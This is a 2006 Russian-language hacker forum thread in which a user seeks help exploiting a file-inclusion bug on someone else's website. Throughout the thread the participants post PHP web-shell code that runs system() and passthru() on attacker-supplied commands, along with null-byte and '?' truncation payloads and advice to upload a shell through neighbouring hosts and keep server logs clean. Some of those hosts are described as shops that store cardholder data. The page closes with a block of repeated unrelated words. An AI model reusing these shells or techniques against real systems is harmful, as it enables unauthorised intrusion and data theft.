инклуда

durito · 24.10.2006

короче есть стандартная инклюда

https://xxx.com/index.php?src=http://durito.narod.ru/sh.html

открывает исходный код sh.html:

<?
echo "<DIV align=left><PRE>";
system($_GET['cmd']);
echo "</PRE></DIV>";
?>

проблема в том, что скрипт index.php отсекает все команды после sh.html
поэтому выполнить их невозможно.
при запросе https://xxx.com/index.php?src=http://durito.../sh.html?cmd=ls
опять выдает исходный код

как это обойти? помню было что-то подобное у чела, там инклудился r57shell и команды выполнялись без проблем

aivus · 24.10.2006

Попробуй в http://durito.narod.ru/sh.html вставить например

Код:

<?php
echo "<DIV align=left><PRE>";
system('ls -lia');
echo "</PRE></DIV>";
?>

Уверен что он вообще работает может там htmlspecialchars() стоит и по этому ты просто видишь код....

k073g · 24.10.2006

...помню было что-то подобное у чела, там инклудился r57shell и команды выполнялись без проблем

r57shell работает через POST запросы:/ и резаться ничего не будет и логи веб сервера чисты.

p-range · 25.10.2006

Раз видно исходник страницы, скорее всего скрипт использует функцию htmlspecialchars(); перед инклудом.

Great · 25.10.2006

r57shell работает через POST запросы:/

кстати, не весь

durito · 25.10.2006

Раз видно исходник страницы, скорее всего скрипт использует функцию htmlspecialchars(); перед инклудом.

зато если инклудить https://xxx.com/index.php?src=http://durito.narod.ru/sh.html
где sh.html выглядит так :

<?php passthru("$cmd"); ?>

то исходный код не выводится, но и выполнить команду я не могу

зато при запросе если инклудить https://xxx.com/index.php?src=index.php%00
не вылетает ошибка о недопустимом расширении файла, то есть расширение отсекается
но пройти я могу только на одну директорию выше, дальше сервак блокирует запросы

aivus · 25.10.2006

НУ в таком случае попробуй https://xxx.com/index.php?src=http://durito...d.ru/sh.html%00

k1b0rg · 25.10.2006

https://xxx.com/index.php?src=http://durito...d.ru/sh.html%00

правильней и универсальней будет использовать

Код:

https://xxx.com/index.php?src=http://durito.narod.ru/sh.html?

? режет на ура все ненужные справа бяки.

durito · 26.10.2006

https://xxx.com/index.php?src=http://durito.narod.ru/sh.html?

выводит исходник

непоиму если htmlspecialchars(); перед инклудом, то почему

https://xxx.com/index.php?src=index.php%00

исходник не выводится?

p-range · 26.10.2006

durito

Скорее всего исходник выводится. Посмотри сурс страницы.

durito · 26.10.2006

в том то и дело, что в этом случае выводит не исходник

pro5to · 26.10.2006

может с инклудом всё в порядке , как видно.
попробуй заюзать скрипт с принт.
просто у меня подозрение на safe mode
Директивы типа

Код:

safe_made_exec_dir string

safe mode,system() или еще что

durito · 27.10.2006

а можно поподробнее прояснить?
может мануал какой есть?

pro5to · 27.10.2006

ну попробуй проинклудить файл

Код:

<?
print "pis!!";
?>

если дело в ограничение (допустим safe mode), а не что то другое
то выдаст pis!!
мануал

УЧЕБНИК ПО PHP (Personal Home Page)

durito · 27.10.2006

короче выводит пустую страницу, исходный код которой выглядит так:

<?
print "pis!!";
?></textarea></form>
</title></comment></a>
</div></span></ilayer></layer></iframe></noframes></style></noscript></table></script></applet></font>
<style>
#bn {display:block;}
#bt {display:block;}
</style>

то есть нихрена не выполняет

зато продвинулся в локальной инклуде, если подставлять символ ? то можно инклудить файлы с любым расширением в директориях веб-сервера, дальше не пускает:

http://ххх.com/index.php?src=./site/docs/esign.php?html

с нулевым байтом %00 такое было возможно только в собственной директории

pro5to · 27.10.2006

хм.. .. а если сделать так http://ххх.com/index.php?src='
реально код ошибки посмотреть?
может там и нужен локальный инклуд! пройдись domainsdb.net и заюзай кряк инета.. или ручками багу на остальных хостах найди.. залей шелл и проинклудь его.
вот и всё

durito · 27.10.2006

а если сделать так http://ххх.com/index.php?src='

в ответ:

The requested URL /site/'.html was not found on this server.

похоже тут вообще не инклуда, файл подгружается во фрейм:

<iframe name="rmFrame" id="rmFrame" height="226" width="411" frameborder="0" src="faq.html" scrolling="yes"></iframe>

p-range · 31.10.2006

durito
Да, скорее всего не инклуд. При инклуде обычно выдается ошибка:
Warning: main(file.php)...

durito · 31.10.2006

пройдись domainsdb.net и заюзай кряк инета.. или ручками багу на остальных хостах найди.. залей шелл и проинклудь его

уже прошелся, это было единственный запрос похожий на баг, все остальные - это системы авторизации шопов для хранения данных картхолдеров

k1b0rg · 01.11.2006

The requested URL /site/'.html was not found on this server.

Тут только локальный инклудинг да и то чтобы на конце был был %00
Удаленно ты не сможешь проинклудить файл.

инклуда

(L3) cache

(L3) cache

CD-диск

CD-диск

CPU register

(L3) cache

(L3) cache

RAID-массив

(L3) cache

CD-диск

(L3) cache

RAM

(L3) cache

RAM

(L3) cache

RAM

(L3) cache

CD-диск

(L3) cache

RAID-массив